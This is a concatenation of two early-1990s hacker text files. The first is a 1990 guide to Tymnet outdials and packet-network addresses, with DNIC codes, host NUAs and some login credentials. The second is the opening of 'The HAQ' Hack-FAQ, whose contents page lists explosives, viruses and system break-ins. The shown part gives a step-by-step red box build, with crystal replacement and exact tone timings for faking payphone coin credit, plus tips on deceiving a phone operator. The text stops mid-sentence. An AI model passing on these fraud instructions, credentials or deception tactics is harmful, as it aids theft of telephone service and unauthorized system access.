|407 FL 03106 00 9902 Stuart |813 FL 03106 00 4637 Clearwater |
|407 FL 03106 00 6181 Vero Beach |813 FL 03106 00 9453 Fort Meyers |
|407 FL 03106 00 3326 West Palm Beach |813 FL 03106 00 116 Naples |
|408 CA 03106 00 5379 Monterey |813 FL 03106 00 5518 Tampa |
|408 CA 03106 00 3655 Salinas |814 PA 03106 00 3338 Erie |
|408 CA 03106 00 6450 San Jose |814 PA 03106 00 3765 State College |
|408 CA 03106 00 3182 Santa Cruz |815 IL 03106 00 4144 Bradley |
|409 TX 03106 00 4497 Bryan |815 IL 03106 00 2514 Freeport |
|412 PA 03106 00 4153 Greensburg |815 IL 03106 00 6048 Rockford |
|412 PA 03106 00 7851 New Castle |817 TX 03106 00 9337 Arlington |
|412 PA 03106 00 7408 Pittsburgh |817 TX 03106 00 5990 Denton |
|413 MA 03106 00 3948 Springfield |817 TX 03106 00 9337 Fort Worth |
|414 WI 03106 00 8868 Appleton |817 TX 03106 00 9861 Killeen |
|414 WI 03106 00 9167 Brookfield |817 TX 03106 00 4687 Temple |
|414 WI 03106 00 3421 Green Bay |817 TX 03106 00 9859 Waco |
|414 WI 03106 00 9167 Milwaukee |817 TX 03106 00 6862 Wichita Falls |
|414 WI 03106 00 5966 Oskosh |818 CA 03106 00 9204 Alhambra |
|415 CA 03106 00 7399 Fremont |818 CA 03106 00 2841 Burbank |
|415 CA 03106 00 8963 Oakland |818 CA 03106 00 9204 Pasadena |
|415 CA 03106 00 9202 Pleasanton |818 CA 03106 00 9206 Sherman Oaks |
|415 CA 03106 00 9182 Redwood City |901 TN 03106 00 3175 Jackson |
|415 CA 03106 00 9533 San Francisco |901 TN 03106 00 1551 Memphis |
|415 CA 03106 00 8094 San Rafael |904 FL 03106 00 5797 Jacksonville |
|415 CA 03106 00 3486 So. San Francisco|904 FL 03106 00 7220 Ocala |
|415 CA 03106 00 9202 Walnut Creek |904 FL 03106 00 1069 Ormond Beach |
|417 MO 03106 00 1928 Joplin |904 FL 03106 00 3193 Pensacola |
|419 OH 03106 00 6022 Mansfield |904 FL 03106 00 3192 Tallahassee |
|419 OH 03106 00 1190 Toledo |913 KS 03106 00 8615 Mission |
|501 AK 03106 00 7374 Fayetteville |913 KS 03106 00 3416 Salina |
|501 AK 03106 00 1297 Fort Smith |913 KS 03106 00 1672 Topeka |
|501 AK 03106 00 2725 Hot Springs |914 NY 03106 00 8861 Kingston |
|501 AK 03106 00 1069 Little Rock |914 NY 03106 00 1061 New City |
|502 KY 03106 00 3718 Frankfort |914 NY 03106 00 8571 White Plains |
|502 KY 03106 00 8678 Louisville |915 TX 03106 00 6980 Abilene |
|503 OR 03106 00 8603 Corvallis |915 TX 03106 00 210 El Paso |
|503 OR 03106 00 9857 Eugene |915 TX 03106 00 2326 Midland |
|503 OR 03106 00 9164 Portland |916 CA 03106 00 7801 Chico |
|503 OR 03106 00 3174 Salem |916 CA 03106 00 9179 Sacramento |
|504 LA 03106 00 6999 Baton Rouge |918 OK 03106 00 6605 Tulsa |
|504 LA 03106 00 9694 New Orleans |919 NC 03106 00 9986 Durham |
|504 LA 03106 00 1040 Slidell |919 NC 03106 00 1100 Fayetteville |
|505 NM 03106 00 661 Albuquerque |919 NC 03106 00 2964 Greensboro |
|505 NM 03106 00 6630 Las Cruces |919 NC 03106 00 9324 Rocky Mount |
|505 NM 03106 00 4604 Santa Fe |919 NC 03106 00 8739 Winston Salem |
+————————————–+————————————–+

Instructions for TymNet OutDials:
For example, if you wish to connect with the outdial port in Norfolk, Virginia
you would enter Username:6896;password. The following information would then
be displayed:

TYMNET ASYNC OUTDIAL 6986 (804) 857 NORFOLK , VA

>

At the “>” prompt, you may type “help” and receive the following screen:

>help
Set [Half] [Rxon] [Xon] [Even|Space] [Crdelay]
Half – sets half-duplex communications. Default is full-duplex.
Xon – sets flow control for data you send. Default is no xon.
Rxon – sets flow control for data you receive. Default is no rxon.
Even – sets even parity for data sent. Default is no parity.
Space – sets space parity for data sent. Default is no parity.
Crdelay – set printer carriage return delay. Default is no delay.
Bps [300|1200|2400]
Sets one of the baud rates indicated above. Default is 2400 bps.
Dial [Tone] [Pulse] {phone number}
Dials the requested phone number. Parameters are:
Tone – activates touch-tone dialing. Default is tone.
Pulse – activates pulse dialing.
Optional commas – provide a one second pause. Default is no pause.
Retry – Redials last phone number.
Logout – Exits Outdial.
Help or ? – Prints this screen.

NOTES: * Dialed number need not be preceded by “9”.
* In some locations, long-distance numbers must be preceded by “1”.

If, at this point, you wish to connect with a BBS whose phone number is,
for example, 555-1212, you would enter at the “>” prompt, the string
“d 5551212”. This causes the outdial modem to dial the number and connect
you at 2400 bps. If the host BBS only has 1200 bps modems, you would need
to first enter “bps 1200” at the “>” prompt. This sets the outdial modem
to call the host at 1200 bps rather than 2400 bsp.

If the BBS is busy you will usually receive a “BUSY” indicator, at which
point you can type “r” to redial the number or “logout” to disconnect and
return to the “please log in” prompt. At the “please log in” prompt, you
may simply disconnect.

What does the connect string mean?

TYMNET ASYNC OUTDIAL 6986 (804) 857 NORFOLK , VA

: : :
Outdial Port # Area Code Local exchange

TymNet permits you to make long distance calls from the outdial port.
You can determine if a BBS can be reached with a local call from an outdial
port by calling the operator in the destination city and asking if it is a
local call from the exchange. For example: Virginia Beach exchange 495 is
a local call from Norfolk exchange 857. If the BBS is outside the local
dialing area, you can still reach it by putting a “1” in front of the
number at the “>” prompt. Example: “d 15551212”. ALL LONG DISTANCE TOLL
CHARGES WILL BE CHARGED TO YOU!

ERROR MESSAGES AND PROBABLE CAUSES

The following are common error messages and some causes:

HOST OUT OF PORTS
All available outdial modems at the outdial city are in use.

BUSY
The host BBS’s phone lines are all busy.

CALL FAILED FOR UNKNOWN REASON
Usually indicates that a voice answered the phone call. Call the number by
voice to determine if it is still a viable number.

Can also be caused by low quality modem on the BBS or the BBS only
operating at 1200 bps. Try the “bps 1200” cure mentioned above.

Can also mean the BBS has all lines in use and the modem did not detect the busy signal.

MODEM TIMED ITSELF OUT – CALL CUSTOMER SERVICE
Modem malfunction or all BBS lines are busy. Please report this to TYMNET at 800-336-0149 immediately.

SUGGESTIONS

There are some methods you can use to improve the TymNet service from your end. The two most common complaints and the easiest to cure are file transfer speedups and interactive response speedups.

To improve file transfers:

Enter a control-V before typing in your TymNet username. Example: “STA000000;password”. This means hold down your control key and tap the “V” key before entering your Username. This opens up the band width and improves transfer time.

To improve interactive response time:

Enter a control-I before your TymNet username. Example:
” STA000000;password”. Enter this the same way as the example above and the response time through the network will be faster. Perfect for chatting or e-mail, etc.

Members calling a 2400 Baud BBS using a 1200 Baud modem can improve file transfers and reduce error messages by putting control-X control-R before the Username when logging on to the network. This enables X-on, X-off flow control and prevents the BBS from sending data to you faster than you can accept it. Never use Control-X, Control-R together with
Control-V. It will really make a mess of things.

FILE TRANSFERS

Almost all BBS software requires that you transfer files at 8 data bits, No parity and 1 stop bit. If you are having trouble with file transfers this will usually be the problem. If you cannot access the network from your local number at 8-N-1 and must log on at 7-E-1, have your software switch to 8-N-1 after you have entered the “>d #######” command and before the BBS connects. Some BBS software doesn’t care what settings you use until you try to transfer a file. To prevent wasting valuable network time, it’s
best to assume that you need 8-N-1 and change to that setting prior to attempting a transfer. Please be sure that if you have striped your high bits, you now turn them back on before transfers!

————————————————————

Datapac Outdials Accessable from Tymnet:
Dialing instructions are available at the site.

————————————————————
3020 6920 0902 ( 300 baud)(204, Manitoba,Winnipeg)
3020 6920 0901 (1200 baud)
3020 7210 0900 ( 300 baud)(306, Saskatchewan,Regina)
3020 7210 0901 (1200 baud)
3020 7110 0900 ( 300 baud)(306, Saskatchewan, Saskatoon)
3020 7110 0901 (1200 baud)
3020 6330 0900 ( 300 baud)(403, Alberta, Calgary)
3020 6630 0901 (1200 baud)
3020 5870 0900 ( 300 baud)(403, Alberta, Edmonton)
3020 5870 0901 (1200 baud)
3020 9160 0901 ( 300 baud) (416, Ontario, Toronto)
3020 9160 0902 (1200 baud)
3020 3850 0900 ( 300 baud) (416, Ontario, Hamilton)
3020 3850 0901 (1200 baud)
3020 7460 0900 ( 300 baud) (506, Brunswick, Saint john)
3020 7460 0901 (1200 baud)
3020 8270 0902 ( 300 baud) (514, Quebec, Montreal)
3020 8270 0903 (1200 baud)
3020 3560 0900 ( 300 baud) (519, Ontatio, London)
3020 3560 0901 (1200 baud)
3020 2950 0900 ( 300 baud) (519, Ontario, Windsor)
3020 2950 0901 (1200 baud)
3020 3340 0900 ( 300 baud) (519, Ontario,Kitchener)
3020 3340 0901 (1200 baud)
3020 6710 0900 ( 300 baud) (604, British Col, Vancouver)
3020 6710 0901 (1200 baud)
3020 8570 0901 ( 300 baud) (613, Quebec, Ottawa)
3020 8570 0902 (1200 baud)
3020 3850 0900 ( 300 baud) (613, Ontatio,Hamilton)
3020 3850 0901 (1200 baud)
3020 7810 0900 ( 300 baud) (709, Brunswick, St. John’s)
3020 7810 0901 (1200 baud)
3020 7610 1900 ( 300 baud) (902, Nova Scotia, Halifax)
3020 7610 1901 (1200 baud)
3020 3850 0900 ( 300 baud) (416, Ontario,Hamilton)
3020 3850 0901 (1200 baud)
3020 9190 0900 ( 300 baud) (???, ???????, Clarkson)
3020 9190 0901 (1200 baud)

Country and system DNIC codes, compiled by Digital-demon.
Note that many countries have multiple systems and so even multiple DNIC codes for the supposedly same system. The Network names may not be the correct ones, but they are the ones listed throughout the systems. I have come upon multiple names for the same systems in some cases and have decided on using one of the two or more. I apologize if this creates any confusion.

COUNTRY NETWORK DNIC
——- ——- —-
ANDORA ANDORPAC 2945
ANTIGUA AGANET 3443
ARGENTINA ARPAC 7220
ARPAC 7222
AUSTRIA DATEX-P 2322
DATEX-P TTX 2323
RA 2329
AUSTRALIA AUSTPAC 5052
OTC DATA ACCESS 5053
AUSTPAC 5054
BAHAMAS BATELCO 3640
BAHRAIN BAHNET 4263
BARBADOS IDAS 3423
BELGIUM DCS 2062
DCS 2068
DCS 2069
BERMUDA BERMUDANET 3503
BRAZIL INTERDATA 7240
RENPAC 7241
RENPAC 7248
RENPAC 7249
CAMEROON CAMPAC 6242
CANADA DATAPAC 3020
GLOBEDAT 3025
INFOGRAM 3028
INFOSWITCH 3029
CAYMAN ISLANDS IDAS 3463
CHAD CHAD 6222
CHANNEL IS PSS 2342
CHILE ENTEL 7302
CHILE-PAC 7303
VTRNET 7305
ENTEL 7300
CHINA PTELCOM 4600
COLOMBIA COLDAPAQ 7322
COSTA RICA RACSAPAC 7120
RACSAPAC 7122
RACSAPAC 7128
RACSAPAC 7129
CURACAU UDTS 3400
CYPRUS CYTAPAC 2802
CYTAPAC 2807
CYTAPAC 2808
CYTAPAC 2809
DENMARK DATAPAK 2382
DATAPAK 2383
DJIBOUTI STIPAC 6382
DOMINICAN REP. UDTS-I 3701
EGYPT ARENTO 6020
FINLAND DATAPAK 2441
DATAPAK 2442
DIGIPAK 2443
FRANCE TRANSPAC 2080
NTI 2081
TRANSPAC 2089
TRANSPAC 9330
TRANSPAC 9331
TRANSPAC 9332
TRANSPAC 9333
TRANSPAC 9334
TRANSPAC 9335
TRANSPAC 9336
TRANSPAC 9337
TRANSPAC 9338
TRANSPAC 9339
FR ANTILLIES TRANSPAC 2080
FR GUIANA TRANSPAC 2080
DOMPAC 7420
FR POLYNESIA TOMPAC 5470
GABON GABONPAC 6282
GERMANY F.R. DATEX-P 2624
DATEX-C 2627
GREECE HELPAK 2022
HELLASPAC 2023
GREENLAND KANUPAX 2901
GUADELOUPE DOMPAC 3400
GUAM LSDS-RCA 5350
PACNET 5351
GUATEMALA GUATEL 7040
GUATEL 7043
HONDURAS HONDUTEL 7080
HONDUTEL 7082
HONDUTEL 7089
HONG KONG INTELPAK 4542
DATAPAK 4545
INET HK 4546
HUNGARY DATEX-P 2160
DATEX-P 2161
ICELAND ICEPAK 2740
INDIA GPSS 4042
INDONESIA SKDP 5101
IRELAND EIRPAC 2721
EIRPAC 2724
ISRAEL ISRANET 4251
ITALY DARDO 2222
ITAPAC 2227
IVORY COAST SYTRANPAC 6122
JAMAICA JAMINTEL 3380
JAPAN GLOBALNET 4400
DDX 4401
NIS-NET 4406
VENUS-P 4408
VENUS-P 9955
VENUS-C 4409
KOREA REP DACOM-NET 4501
DNS 4503
KUWAIT BAHNET 4263
LEBANON SODETEL 4155
LUXEMBOURG LUXPAC 2704
LUXPAC 2709
MACAU MACAUPAC 4550
MALAYSIA MAYPAC 5021
MARTININQUE DOMPAC 3400
MAURITIUS MAURIDATA 6170
MEXICO TELEPAC 3340
MOROCCO MOROCCO 6040
NETHERLANDS DATANET-1 2040
DATANET-1 2041
DABAS 2044
DATANET-1 2049
N. MARIANAS PACNET 5351
NEW CALEDONIA TOMPAC 5460
NEW ZEALAND PACNET 5301
NIGER NIGERPAC 6142
NORWAY DATAPAC TTX 2421
DATAPAK 2422
DATAPAC 2423
PANAMA INTELPAQ 7141
INTELPAQ 7142
PERU DICOTEL 7160
PHILIPPINES CAPWIRE 5150
CAPWIRE 5151
PGC 5152
GMCR 5154
ETPI 5156
PORTUGAL TELEPAC 2680
SABD 2682
PUERTO RICO UDTS 3300
UDTS 3301
QATAR DOHPAC 4271
REUNION (FR) TRANSPAC 2080
DOMPAC 6470
RWANDA RWANDA 6352
SAN MARINO X-NET 2922
SAUDI ARABIA ALWASEED 4201
SENEGAL SENPAC 6081
SINGAPORE TELEPAC 5252
TELEPAC 5258
ITELPAK 4542
SOUTH AFRICA SAPONET 6550
SAPONET 6551
SAPONET 6559
SOUTH KOREA DACOM-NET 4501
SPAIN TIDA 2141
IBERPAC 2145
SWEDEN DATAPAK TTX 2401
DATAPAK-1 2402
DATAPAK-2 2403
TELEPAK 2405
SWITZERLAND TELEPAC 2284
TELEPAC 2289
TAIWAN PACNET 4872
PACNET 4873
UDAS 4877
THAILAND THAIPAC 5200
IDAR 5201
TOGOLESE REP. TOGOPAC 6152
TORTOLA IDAS 3483
TRINIDAD DATANETT 3745
TEXTET 3740
TUNISIA RED25 6050
TURKEY TURPAC 2862
TURPAC 2863
TURKS&CAICOS IDAS 3763
U ARAB EMIRATES EMDAN 4241
EMDAN 4243
TEDAS 4310
URUGUAY URUPAC 7482
URUPAC 7489
USSR IASNET 2502
U.S. VIRGIN I UDTS 3320
U. KINGDOM IPSS-BTI 2341
PSS-BT 2342
MERCURY 2350
MERCURY 2351
HULL 2352
USA AUTONET 3126
COMPUSERVE 3132
FTCC 3124
ITT/UDTS 3103/310
MARKET 3136
RCA/LSDS 3113
TELENET 3110/312
TRT-DTAPAK 3119
TYMNET 3106
UNINET 3125
WUI-DBS 3104
WUTCO 3101
YUGOSLAVIA YUGOPAC 2201
ZIMBABWE ZIMNET 6482

—————————————-
ALTERNATIVE DATA
NUA: 234222400127
—————————————-
THE PAKR
NUA:234222400127
—————————————
BRIGHTON POLYTECHNIC
NUA: 234270500115
—————————————-
BRITISH LIBRARY
NUA:2342227900102 (Blaise-Line)
310600128800 (Blaise-Link)
————————————–
THE BRITISH LIBRARY
NUA: 234293765265
—————————————-
BRITISH MARITIME TECHNOLOGY (LIMITED)
Davy Bank Industrial Estate
Wallsend Research Station,
NUA: 234263200106
—————————————-
CABLE AND WIRELESS EASYLINK LTD
Mercury House
NUA: 234218400120
—————————————-
CAMBRIDGE UNIVERSITY COMPUTING SERVICE
NUA: 234222339399
—————————————-
CITY OF BIRMINGHAM POLYTECHNIC
NUA: 234221200114
—————————————-
CODUS LIMITED
NUA: 234274200103
—————————————-
COMNET GLOBAL COMMUNICATIONS LTD
NUA:234213401278
234213401277
—————————————
COMPU-MARK (UK) LTD
PSS NUA: 23421230024700
—————————————
COUNTING HOUSE COMPUTER SYSTEMS (1984) LTD
NUA: 2342284001440
—————————————-
DATABASE SYSTEMS (GB) LTD
NUA: 234258200103
—————————————
DATASOLVE LTD
NUA: 234213300124
—————————————-
DATEMA LIMITED
NUA: 234227200147
—————————————
DIALOG
NUA:23421230012011 (Dialnet)
23421230012013 (Dialmail)
3106900803 (Tymnet)
3106900061 (Tymnet)
3110415000200 (Telenet)
3110415000480 (Telenet)
3110213001700 (Telenet)
3110213002360 (Telenet)
312541500007 (Uninet)
312541500008 (Uninet)
3125415000027 (Uninet)
—————————————–
DILLON COMPUTING LIMITED
NUA: 234227230231
—————————————-
DRI EUROPE LTD
NUA:234219201105
3106900788
3106900218
—————————————-
DUN AND BRADSTREET
NUA: 234289500108
—————————————-
DYNATECH
NUA: 234270712221
—————————————-
EDINBURGH REGIONAL
NUA: 234231354354
—————————————
THE ELECTRONIC MAIL COMPANY LTD
NUA: 23428440010500
23428440010501
23428440010502
23428440010503
23428440010504
—————————————-
ENGINEERING INFORMATION COMPANY LTD
NUA 23421338012200
—————————————
ESSEX UNIVERSITY
NUA: 234220641141
————————————–
EXIS LIMITED
NUA: 234232500124
————————————–
FINSBURY DATA SERVICES LTD
NUA: 234219200101
————————————–,
NUA: 234274900101
————————————–
GSI (UK) LTD
NUA: 234227600139
————————————–
HATFIELD POLYTECHNIC
NUA: 234270712217
————————————–
HIGH LEVEL HARDWARE LIMITED
NUA: 23422350010999
————————————–
HUDDERSFIELD POLYTECHNIC
NUA: 234227400101
————————————–
INTERSCAN COMMUNICATIONS SYSTEMS LTD
NUA: 234275300124
————————————-
IRS DIALTECH
NUA: 234219201156
————————————-
ISTEL LIMITED
NUA: 234252724241
————————————-
KENT UNIVERSITY
NUA: 234222715151
————————————
KODA ONLINE
NUA: 234262200114 KODA
228468114080 EKOL (SWITZERLAND)
————————————
KOREAN BITNET
NUA: 4501201010100
—————————————
KOREAN PC-SERVE
NUA: 4501981
4501982
—————————————
LOCKHEED CORPORATION (INTERNATIONAL) S.A.
NUA: 234212300120
————————————–
LONGMAN CARTERMILL LIMITED
NUA: 234233400101
—————————————
MEAD DATA CENTRAL INTERNATIONAL
NUA: 234219200171
—————————————
MEJ ELECTRONICS LTD
NUA: 234275300131
————————————–
NEWCASTLE-UPON-TYNE UNIVERSITY
NUA: 234263259159
————————————–
NIXDORF COMPUTER
NUA: 234274200127
————————————-
OCLC EUROPE
NUA: 234221200145
————————————-
ONE TO ONE
NUA: 234212301281
————————————-
P&O EUROPEAN FERRIES
NUA: 234230415150
————————————-
PERGAMON ORBIT INFOLINE LTD
NUA:234284400162
3106009211 (Tymnet)
311070300141 (Telenet)
————————————-
PLESSEY CONTROLS LIMITED
NUA: 234219201002
————————————
PRAXIS SYSTEMS PLC
NUA: 234222500101
————————————-
SALFORD UNIVERSITY
NUA: 23426164321090
————————————-
SCICON LIMITED
NUA: 234290840111
————————————-
NUA: 234250600119
————————————
NUA: 234219200203
————————————-
SIA COMPUTER SERVICES
NUA: 234219200394
————————————-
THE SOFTWARE FORGE
NUA: 234273400156
————————————-
Bath University
NUA: 234222530303
————————————
THE STOCK EXCHANGE
NUA: 23421920010300
———————————–
STRATHCLYDE UNIVERSITY
NUA: 23424126010604
————————————
TELEFILE COMPUTER PRODUCTS LTD
NUA: 23427531732700
————————————
NUA: 23421230021001
————————————
T T INTERNATIONAL
NUA: 234218800168
————————————
UNI-NET
NUA: 655011101207 LOGIN: UNINET
PASS:NEW
————————————–
UNIVERSITY COLLEGE LONDON
NUA: 234219200300
————————————
UNIVERSITY OF WALES INSTITUTE OF SCIENCE & TECHNOLOGY
NUA: 234222236236
—————————————-
WEATHERBYS
NUA: 23426040010500
—————————————
WILTEK (UK) LTD
NUA: 234213300104
—————————————
WOLVERHAMPTON POLYTECHNIC
NUA: 234290200107
—————————————
BIX-LIKE SYSTEM
NUA: 45890010006
login: guest
—————————————
Prestel
NUA: 23411002002017
ID: 4444444444
pass:4444
A23411002002018
—————————————
MEP
NUA: 22846911003
login: cia0543
password: guest
—————————————
EMPAL BBS
NUA: 12210613300
————————————–
OAG
NUA: 311031200159
————————————–
PRIME
NUA: 302031400124
—————————————
QUICK BROWN FOX
NUA: 228462100990
—————————————
GENIE
NUA: 3136900
—————————————
CALVACOM (in french)
NUA: 208075111
login: NOUVEAU or NEW
—————————————
BAHAMIN TELEPHONENUA: 302079100900
—————————————-
MINITEL
NUA: 208075040390
—————————————-
TCICS
NUA: 44013612065
<3 returns>
login: guest or login: postcard
—————————————
CIS
NUA: 311020200202
3106*DCIS02
————————————–
HEBREW UNIVERSITY
NUA: 452120000113
—————————————-
CHAT SYSTEM
NUA: 2624521090832
—————————————

Well I think that is enough for the first installment of packet networks. For those of you confused on the use of any part of this text please contact me, Digital-demon, at THE MATRIX BBS 1-908-905-6691 or 1-201-905-6691.

Remember, the information presented within this text is for information purposes only, this author will NOT be held responsible for an actions by anyone other than himself. I hope it was as informational to you as it was to me when I was compiling this text.

Greets to my friends and allies in this dangerous world: Tal Meta, Midnite Raider, CyberSage, Rat Fink, Sir Hairy Legg/Leech, Cool One, Pulsar-Nova, Kludge, D_Flatline, and everyone else on QSD that has helped me in this endevor.

By the way, anyone interested in finding tons of information on packet entworks should check out the subs devoted to them on BIX and some of the larger networks, they were very informative.

“Death Rules the World, Let the DEVIL beware, and let GOD weep.” _-Tensen Darquist

<*********************************************************>
< >
< >
< This Phile on >
< >
< Packet Networks >
< >
< Brought to you by >
< >
< Digital-demon >
< (C) DEC 29,1990 >
< >
< >
<*********************************************************>
[7] Tfiles: (1-8,?,Q) :

The HAQ (Hack-FAQ Version 2.07) (June 11, 1994)

Jun 13, 1994 19:54 from Belisarius

_____________
/ / / *** *** ****** ******
/ *** *** ********* *********
/ / *** *** *** *** *** ***
/ / *********** *********** *** ***
/ /_____ ______ *********** *********** *** ** ***
/ / / /_____/ *** *** *** *** *** *****
/ / / / *** *** *** *** ***********
/ / / /______ *** *** *** *** ***** ***

+—————+
| THE HAQ |
| Edition 2.07 |
| 11 JUN 1994 |
+—————+

“Knowledge is power” –Francis Bacon
“United we stand, divided we fall” –Aesop

=+=+=+=+=+=+=+=+=+= HACK-FAQ! Non-Copyright Notice =+=+=+=+=+=+=+=+=
= =
+ MatrixMage Publications. 1994 No rights reserved. +
= =
+ This file may be redistributed provided that the file and this +
= notice remain intact. This article may not under any =
+ circumstances be resold or redistributed for compensation of any +
= kind. Distribution of THE HACK-FAQ! is encouraged and promoted. =
+ +
=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=

<*> Edited by <*>

# Editor-in-Chief #
Belisarius < temporary loss of E-mail >
can be reached on ISCA, Shadow, SkyNET, Brinta and
Baltimore 2600 Meetings and other nameless locations.

# Asst. Editor (non communicado) #
Neurophire (on Shadow and N P on ISCA)

A MatrixMage Electronic Publication

Special Thanks to the Following Contributors:
Z Maestro RA of ISCA Underground>
DINO RA of Shadow Hack and Crack>
Artimage RA of SKYNET Underground>

Faunus Revolution Miska Informatik
Matrixx Amarand Crypto Steelyhart aBBa / PfA
Beelzebub Redbeard Squarewave
IO CyberSorceror Caustic
Doktor Nil Skipster Walrus
CPT Ozone Abort Kyoti
Carsenio Aero Phrack

AND NOW A WORD FROM YOUR EDITOR:

Throughout history mankind has been afraid of the unknown.
Before lightning could be scientifically explained it was blamed on
the anger of the gods. This belief in mysticism persisted throughout
the ages (and still does today). Later as man acquired simple herbal
and chemical knowledge, these men were revered as mages, users of
mystical arts derived from the old gods. But as organized religion
(i.e. Christianity especially Roman Catholicism) spread and came to
dominate society (became the powers that be), the mage was no longer
revered. The mage (who only sought to understand the world around
himself and make the world a better place) was persecuted, attacked
and driven underground by the church. But driving these mages
underground (out of society) did not stop there ideas from spreading
or them from continuing to work. The church label Copernicus as a
heretic and mage and only this century has the Roman Catholic church
accepted his principles (heliocentric universe) as fact.
So are ‘hackers’ the same today. We surf the nets seeking
knowledge and information (and hopefully understanding). Information
and understanding the meaning and import of the information are the
two greatest commodities and bases of power in the world today.
These things are easy to disseminate and gather in the electronic
world. The matrix (cyberspace/web/net [whichever term you choose]
is able to influence and control information faster and better than
ever before. This makes many afraid of the cyberculture (not to
mention a deep-seated techno-fear of many people, anything new and
technical is bad).
We are a new breed of mage; seeking knowledge, desiring
understanding, persecuted by the powers that be. This is why I have
started this publication. We are the MatrixMages! Our mission is
to learn and to pass on that knowledge.

-=> Belisarius <=- ********************************************************************* What is 'Cyberpunk' and the Underground? "Every time I release a phile, or write an article for a zine, it's vaguely like a baby. It gets stored, and copied, and sent out all over the world, and people read it. It goes into their minds. Something I created is buried in living tissue and consciousness someplace. Eventually somebody uses it, and I know that I have the power to change the world. Somewhere, someplace, somebody changed something using information I changed or created. I helped to change the world." --Unknown That is the attitude of many of the people who, knowingly or not, are members of this hyped/wired/cyber culture. Some who may read this will see some of their undefined beliefs, hopes and feelings reflected in the above quote. And, as the quote says, they will help spread it. Somewhere, somehow, that quote will change the world. But only if you work to change it. Remember that information and knowledge a powerful commodities. He who has information cannot be beaten. So above all the most important thing to do in the "Underground" is to gather information. This means that you have to work and put in some effort. You don't get something' for nothing! So work hard and together we can change the world! Keep up with latest editions. (Sorry there haven't been many lately but exams and not failing out took precedence!) The Haq, MatrixMage, THE HACK-FAQ!, Belisarius, Neurophyre, or any contributor are not responsible for any consequences. You use this information at your own risk. ********************************************************************* CONTENTS ********************************************************************* Sections I. Phone Fun (Red Boxing, COCOTS, Beige Boxing, Cellulars, etc.) II. Fake E-Mail (Fooling UUCP) III. Social Engineering (Free sodas, Dumpster Diving, ATMs, Carding) IV. The Big Bang (Making Weapons and Explosives) V. Infection (Virii, Trojans, Worms and other creepy crawlies) VI. NEWBIES READ THIS (Basic Hacking) VII. Screwing with the most widespread operating system on the net (UNIX / AIX Hacking) VIII. Screwing with the most secure operating system on the net (VAX/VMS Hacking) IX. Screwing with the most widespread operating system on PCs (MS-DOS Hacks) X. Finding out what that encrypted info is (Cracking programs) XI. How do I keep my info secure (PGP / Cryptology) XII. Chemistry 101 (explosive/pyrotechnic component prep) XIII. Fun things with solder, wires, and parts (Underground electronics) XIV. Watching television (cable, Pay-Per-View(PPV), scrambling) XV. Tuning in to what's on the radio waves (Radios and Scanning) Appendices A. FTP sites with useful info B. Interesting Gophers C. Informative USENET Newsgroups D. Publications and Zines E. Books F. Files and Papers G. Cataglogs H. PGP Keys ********************************************************************* ===================================================================== I. Phone Fun (Red Boxing, COCOTS, Beige Boxing, Cellulars, etc.) WHAT IS A RED BOX AND HOW DO I MAKE ONE? (from Doktor Nil) First note: a redbox is merely a device which plays the tone a payphone makes when you insert money. You just play it through the mike on the handset. You would think that the Phone Co. would mute the handset until you put a quarter in, and perhaps they are starting to build phones like that, but I have yet to see one. What you need: - Radio Shack 33 memory Pocket Tone Dialer - 6.4 - 6.5536 megahertz crystal (get 6.5 MHz from Digikey, address below) - A solder gun. - Someone who can point out the crystal in the Tone Dialer. Instructions: 1) Open up the back of the tone dialer. Use screwdriver. 2) Locate crystal. It should be toward the right side. It will be smaller than the 6.5 MHz one you bought, but otherwise vaguely similar. It is basically capsule-shaped, with two electrodes coming out of the bottom which are soldered onto a circuit board. It's on the _left_ side, basically the third large crystal thing from the bottom, about 1.5 cm long, metallic, thin. 3) De-solder, and de-attach, crystal. Heat the solder that the crystal is seated in; remove crystal. 4) Attach 6.5 MHz crystal. It is easiest just to use the solder which is already there from the old crystal, that way there is less chance of you dropping hot solder somewhere it shouldn't be and losing everything. Heat first one drop of solder with the solder gun, and seat one electrode of the 6.4 MHz crystal in it, then do the same with the other. This is the easiest part to mess up, be careful that both drops of solder don't run together. 5) Put cover back on. you are done. How to use: Five presses of the "*" key will make the quarter sound. I think fewer presses make nickel/dime sounds, but I can't remember specifically. Here in Michigan, you can simply hold it up to the handset and press memory recall button 1 (where you have conveniently recorded five *'s -read the tone dialer directions on how to do this) and get a quarter credit, _IF_ you are calling LD. Keep making the tone to get additional credits. There is a maximum number of credits you can have at once. To make a local call this may not work. You need to first put in a real coin, then you can use the redbox for additional credits. There may be a way around this, however: Call the operator, and ask her to dial your number for you. She should do this without asking why, it is a regular service. If you need an excuse, say the "4" key isn't working, or something. She will ask you to insert your money. At this point use the redbox. If all goes well, she dials your number and you're in business. If she says "Will you do that one more time," or "Who is this," or any variations, hang up and walk away. ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^ WHAT DO THESE CRYSTALS LOOK LIKE? In most cases, a rectangular metal can with two bare wires coming out of one end, and a number like "6.50000" stamped on one side. ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^ WHAT IS THE BEST FREQUENCY FOR THE RADIO SHACK RED BOX CRYSTAL? (from Matrixx) 6.49 is the actual EXACT crystal, 6.5 is more widely used, and 6.5536 is the easiest to find (Radio Shack) ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^ WHERE CAN I GET A CRYSTAL TO MAKE THE RED BOX? The crystals are available from Digi-Key. Call 1-800-DIGIKEY (1-800-344-4539) for more info. The part order number from DIGI-KEY is x-415-ND ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^ WHAT ARE THE ACTUAL FREQUENCIES FOR REDBOX? (from DINO) For a Radio Shack conversion red box: a nickel is one * and a quarter is 5 *'s Here are the freqs for a red box: $.25 1700 Hz & 2200 Hz for a length of 33 milliseconds for each pulse with 33 millisecond pause between each pulse $.10 1700 Hz & 2200 Hz 2 pulses at 66 milliseconds and with 66 millisecond pauses $.05 one pulse at the above freqs for 66 milliseconds! ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^ HOW DO YOU KNOW THAT THE PHONE IS A 